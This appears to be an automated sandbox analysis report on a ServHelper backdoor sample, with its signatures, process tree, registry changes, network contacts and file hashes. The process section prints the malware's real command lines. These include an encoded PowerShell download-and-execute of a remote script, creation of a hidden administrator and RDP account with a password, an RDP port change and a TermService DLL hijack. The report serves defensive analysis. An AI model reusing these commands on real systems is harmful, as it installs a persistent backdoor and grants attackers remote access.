Malware Analysis Report

2024-10-23 17:54

Sample ID 210720-lyfcmb2qna
Target exe1.bin
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2

Threat Level: Known bad

The file exe1.bin was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Blocklisted process makes network request

Sets DLL path for service in the registry

Possible privilege escalation attempt

UPX packed file

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-20 09:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-20 09:16

Reported

2021-07-20 09:20

Platform

win7v20210408

Max time kernel

131s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1323314d-f38f-43cf-8826-e6eae8d79402 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3e54fc2-be7b-4c5b-aa43-a5a343edd931 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b8634b9e-62cb-41f8-bbe4-da7bf5436d03 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXZB1YYNPNPQRGX58D3K.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_281ac449-6d71-4b99-8b80-5addd3c2b549 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_872c52d3-c0cf-4501-adbe-a5e004ef4efb C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea514b11-8fd8-47b7-88ad-1aabf028c967 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5505034d-bee8-49a7-bc94-eb5e1f4ffb6b C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5b04d74-21e7-426a-8ef5-5414996dfe1b C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_179593a8-6966-470f-8620-c781a3dbbe65 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a1938cdf-02b0-497b-bd02-20aadc0e0bdd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03e55983-7a1e-4a20-a1be-3b1870f1f0c6 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b034bf6c587dd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 568 wrote to memory of 1532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 568 wrote to memory of 1532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1532 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1532 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1532 wrote to memory of 1880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 568 wrote to memory of 1372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 568 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 568 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1256 wrote to memory of 1312 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1256 wrote to memory of 1312 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1256 wrote to memory of 1312 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 568 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1392 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES620D.tmp" "c:\Users\Admin\AppData\Local\Temp\4ollxdjq\CSCD430DA36425C492D97B3F7169A39AFC7.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 3wIPoLDq /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 3wIPoLDq /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 3wIPoLDq

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 3wIPoLDq

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

memory/1984-59-0x00000000410A0000-0x000000004134A000-memory.dmp

memory/1984-63-0x0000000040B76000-0x0000000040B77000-memory.dmp

memory/1984-62-0x0000000040B74000-0x0000000040B76000-memory.dmp

memory/1984-61-0x0000000040B72000-0x0000000040B74000-memory.dmp

memory/1984-64-0x0000000040B77000-0x0000000040B78000-memory.dmp

memory/568-65-0x0000000000000000-mapping.dmp

memory/568-66-0x000007FEFC051000-0x000007FEFC053000-memory.dmp

memory/568-67-0x0000000002350000-0x0000000002351000-memory.dmp

memory/568-68-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

memory/568-69-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

memory/568-70-0x000000001B490000-0x000000001B491000-memory.dmp

memory/568-71-0x000000001AA20000-0x000000001AA22000-memory.dmp

memory/568-72-0x000000001AA24000-0x000000001AA26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/568-74-0x000000001C3F0000-0x000000001C3F1000-memory.dmp

memory/1532-75-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.cmdline

MD5 42b1e0d6a1a5d46f424f69c08056f109
SHA1 bde110e753c015e01262d25622879494614f5d8e
SHA256 ced72d70b458a56c64aea1e6980926d396e06fad6cf1a32e3ba52b161962dc63
SHA512 9e3c96c83ee810ecb75ad34a68094a570af7e63566999d3be1c715770196a36a74b16897c629eb0646049484c5177119d2406f52281155a83ffa1e0190da0e71

\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
